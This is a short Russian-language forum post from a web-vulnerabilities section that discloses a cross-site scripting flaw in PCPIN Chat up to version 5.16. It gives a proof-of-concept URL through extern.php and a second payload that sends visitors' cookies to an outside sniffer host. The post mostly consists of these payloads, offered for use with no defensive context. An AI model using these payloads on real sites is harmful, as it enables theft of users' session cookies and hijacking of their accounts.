Чаты Уязвимости CPIN chat.

Discussion in 'Веб-уязвимости' started by Qwazar, 7 Apr 2008.

  1. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Не нашёл открытой темы, куда можно постить уязвимости движков, в общем вот, нашёл почти год назад, не помню, почему так извращался.

    Type:[XSS]
    Product: PCPIN Chat <= 5.16

    Code:
    http://sitename/chat/extern.php?ext=javascript:alert(document.cookie)
    Ну, а на сниффер слал так, наверное можно и проще, сейчас лень было переписывать:

    Code:
    extern.php?ext=javascript:navigate('http:'.concat('//sniffer.xx?',document.cookie))